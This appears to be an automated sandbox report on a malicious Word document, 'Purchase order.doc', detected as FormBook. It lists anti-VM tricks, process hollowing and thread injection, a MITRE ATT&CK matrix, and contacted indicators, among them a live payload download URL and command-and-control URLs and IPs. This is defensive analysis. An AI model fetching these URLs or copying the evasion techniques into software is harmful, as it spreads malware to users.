          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.dr | Stream path '_1696857852/\x1OLe10NATivE' entropy: 7.99643695753 (max. 8.0)

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match | File source: 4.2.villar8681.exe.2500978.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: villar8681.exe PID: 2808, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 0000000000089904 second address: 000000000008990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 0000000000089B6E second address: 0000000000089B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1184 | Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\villar8681.exe TID: 1188 | Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1724 | Thread sleep time: -34000s >= -30000s
          Source: C:\Windows\SysWOW64\raserver.exe TID: 2012 | Thread sleep time: -32000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\raserver.exe | Last function: Thread delayed
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Thread delayed: delay time: 922337203685477
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: explorer.exe, 00000006.00000000.437869266.000000000031D000.00000004.00000020.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | Binary or memory string: vmware
          Source: explorer.exe, 00000006.00000000.451281002.0000000004513000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0)\Co>
          Source: explorer.exe, 00000006.00000000.506462418.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.442969778.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.428319083.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
          Source: explorer.exe, 00000006.00000000.506586274.00000000045CF000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_00409AA0 rdtsc
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_008826F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_021926F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Code function: 5_2_0040ACE0 LdrLoadDll,
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Domain query: www.charlotte-s-creations.com
          Source: C:\Windows\explorer.exe | Network Connect: 54.156.84.168 80
          Source: C:\Windows\explorer.exe | Domain query: www.filecrev.com
          Source: C:\Windows\explorer.exe | Network Connect: 202.165.66.108 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: 740000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processes
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Memory written: C:\Users\user\AppData\Roaming\villar8681.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Thread register set: target process: 1764
          Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 1764
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Process created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\villar8681.exe'
          Source: explorer.exe, 00000006.00000000.503298615.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000007.00000002.679827262.0000000000A80000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
          Source: explorer.exe, 00000006.00000000.503298615.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000007.00000002.679827262.0000000000A80000.00000002.00020000.sdmp | Binary or memory string: !Progman
          Source: explorer.exe, 00000006.00000000.503298615.0000000000750000.00000002.00020000.sdmp, raserver.exe, 00000007.00000002.679827262.0000000000A80000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Queries volume information: C:\Users\user\AppData\Roaming\villar8681.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\villar8681.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.villar8681.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.villar8681.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.villar8681.exe.365d7a0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.villar8681.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.villar8681.exe.360e380.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000005.00000002.462612557.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679408045.0000000000080000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446496993.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.462947003.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.424304556.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679459797.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.454018128.00000000090FF000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.462778282.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.679586100.00000000002F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.427990655.00000000034D9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.424856799.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Command and Scripting Interpreter2 | Path Interception | Process Injection612 | Rootkit1 | Credential API Hooking1 | Security Software Discovery321 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Extra Window Memory Injection1 | Masquerading1 | LSASS Memory | Process Discovery2 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Exploitation for Client Execution13 | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools1 | Security Account Manager | Virtualization/Sandbox Evasion31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion31 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol123 | SIM Card Swap | Carrier Billing Fraud |
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection612 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information1 | Cached Domain Credentials | System Information Discovery113 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information41 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Extra Window Memory Injection1 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |

          Behavior Graph

          [Behavior graph not reproduced. Behavior Graph ID: 510256, Sample: Purchase order.doc, Startdate: 27/10/2021, Architecture: WINDOWS, Score: 100. Information recoverable from the graph:]
          Start node: DNS www.tapehitsscriptsparty.com; signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
          Started: EQNEDT32.EXE; WINWORD.EXE
          EQNEDT32.EXE: binatonezx.tk 2.56.59.211, 49167, 80 GBTCLOUDUS Netherlands; dropped C:\Users\user\AppData\...\villar8681.exe, PE32 and C:\Users\user\AppData\...\villarzx[1].exe, PE32; signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802); started villar8681.exe
          WINWORD.EXE: dropped ~WRF{79E0ADDF-4BCA...C-650BFEE60233}.tmp, Composite
          villar8681.exe: Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; started villar8681.exe
          villar8681.exe (second instance): Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection); injected explorer.exe
          explorer.exe: www.filecrev.com 202.165.66.108, 49168, 80 VPIS-APVADSManagedBusinessInternetServiceProviderMY Australia; www.charlotte-s-creations.com; 2 other IPs or domains; System process connects to network (likely due to code injection or exploit); started raserver.exe
          raserver.exe: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; started cmd.exe

          Screenshots

          [Screenshot thumbnails not reproduced.]

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Purchase order.doc | 40% | Virustotal |
          Purchase order.doc | 34% | ReversingLabs | Document-RTF.Exploit.Heuristic

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp | 100% | Joe Sandbox ML |
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exe | 38% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm
          C:\Users\user\AppData\Roaming\villar8681.exe | 38% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.0.villar8681.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.2.villar8681.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.villar8681.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          5.0.villar8681.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          binatonezx.tk | 15% | Virustotal |
          www.filecrev.com | 5% | Virustotal |
          www.charlotte-s-creations.com | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          http://www.mozilla.com0 | 0% | URL Reputation | safe
          www.filecrev.com/jy0b/ | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67 | 0% | Avira URL Cloud | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://www.collada.org/2005/11/COLLADASchema9Done | 0% | URL Reputation | safe
          http://java.sun.com | 0% | Avira URL Cloud | safe
          http://www.filecrev.com/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj | 0% | Avira URL Cloud | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj | 0% | Avira URL Cloud | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://binatonezx.tk/villarzx.exe | 100% | Avira URL Cloud | malware
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | 54.156.84.168 | true | false | | high
          binatonezx.tk | 2.56.59.211 | true | true | | unknown
          www.filecrev.com | 202.165.66.108 | true | true | | unknown
          www.charlotte-s-creations.com | unknown | unknown | true | | unknown
          www.tapehitsscriptsparty.com | unknown | unknown | true | | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.filecrev.com/jy0b/ | true | Avira URL Cloud: safe | low
          http://www.filecrev.com/jy0b/?06384Dqp=TyGDJhL/cA+57wfufaZRyMMrQk8uPd2d6NfY81Rsj46bZhOJLXgZ522BupBE7+BqQsP88Q==&ct=Xhh4nL38YNvpj | true | Avira URL Cloud: safe | unknown
          http://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67+RpL/0se6tZB+gK2Llczeyi+qylm7PPSapsOoYwZFX50tzMVhi1EMssA==&ct=Xhh4nL38YNvpj | true | Avira URL Cloud: safe | unknown
          http://binatonezx.tk/villarzx.exe | true | Avira URL Cloud: malware | unknown

          URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://investor.msn.com | explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | explorer.exe, 00000006.00000000.451281002.0000000004513000.00000004.00000001.sdmp | false | | high
          http://www.iis.fhg.de/audioPA | explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM | explorer.exe, 00000006.00000000.506586274.00000000045CF000.00000004.00000001.sdmp | false | | high
          http://www.mozilla.com0 | explorer.exe, 00000006.00000000.452985686.0000000007159000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.hotmail.com/oe | explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | false | | high
          https://www.charlotte-s-creations.com/jy0b/?06384Dqp=AerW1ym2Fscv67 | raserver.exe, 00000007.00000002.680534004.0000000002B5F000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
          http://treyresearch.net | explorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | explorer.exe, 00000006.00000000.442147591.0000000003DF8000.00000004.00000001.sdmp | false | | high
          http://www.collada.org/2005/11/COLLADASchema9Done | villar8681.exe, 00000004.00000002.427737802.00000000024D1000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
          http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | false | | high
          http://java.sun.com | explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
          http://www.icra.org/vocabulary/. | explorer.exe, 00000006.00000000.441622463.0000000002CC7000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | villar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmp | false | | high
          http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmp | false | | high
          http://investor.msn.com/ | explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmp | false | | high
          http://www.msn.com/?ocid=iehp | explorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmp | false | | high
          http://www.msn.com/de-de/?ocid=iehp | explorer.exe, 00000006.00000000.506295914.000000000449C000.00000004.00000001.sdmp | false | | high
          http://www.piriform.com/ccleaner | explorer.exe, 00000006.00000000.437737820.00000000002C7000.00000004.00000020.sdmp | false | |
                                          high
                                          http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.433248937.0000000004650000.00000002.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.%s.comPAvillar8681.exe, 00000004.00000002.428624622.0000000005010000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503415143.0000000001BE0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpfalse
                                            high
                                            https://support.mozilla.orgexplorer.exe, 00000006.00000000.437621444.0000000000255000.00000004.00000020.sdmpfalse
                                              high
                                              http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.432356441.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.467536657.0000000001D60000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              low

                                              Contacted IPs


                                              Public

IP | Domain | Country | ASN | ASN Name | Malicious
2.56.59.211 | binatonezx.tk | Netherlands | 395800 | GBTCLOUDUS | true
54.156.84.168 | caddy-2-4-3-a154c717787f8b4f.elb.us-east-1.amazonaws.com | United States | 14618 | AMAZON-AESUS | false
202.165.66.108 | www.filecrev.com | Australia | 18206 | VPIS-APVADSManagedBusinessInternetServiceProviderMY | true

                                              General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 510256
Start date: 27.10.2021
Start time: 16:38:18
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 11m 43s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Purchase order.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOC@9/10@4/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 12.8% (good quality ratio 12.4%)
• Quality average: 76.1%
• Quality standard deviation: 25.5%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtCreateFile calls found
• Report size getting too big, too many NtEnumerateValueKey calls found
• Report size getting too big, too many NtQueryAttributesFile calls found

                                              Simulations

                                              Behavior and APIs

Time | Type | Description
16:38:20 | API Interceptor | 42x Sleep call for process: EQNEDT32.EXE modified
16:38:22 | API Interceptor | 77x Sleep call for process: villar8681.exe modified
16:38:46 | API Interceptor | 108x Sleep call for process: raserver.exe modified

                                              Joe Sandbox View / Context

                                              IPs


                                              Domains


                                              ASN


                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

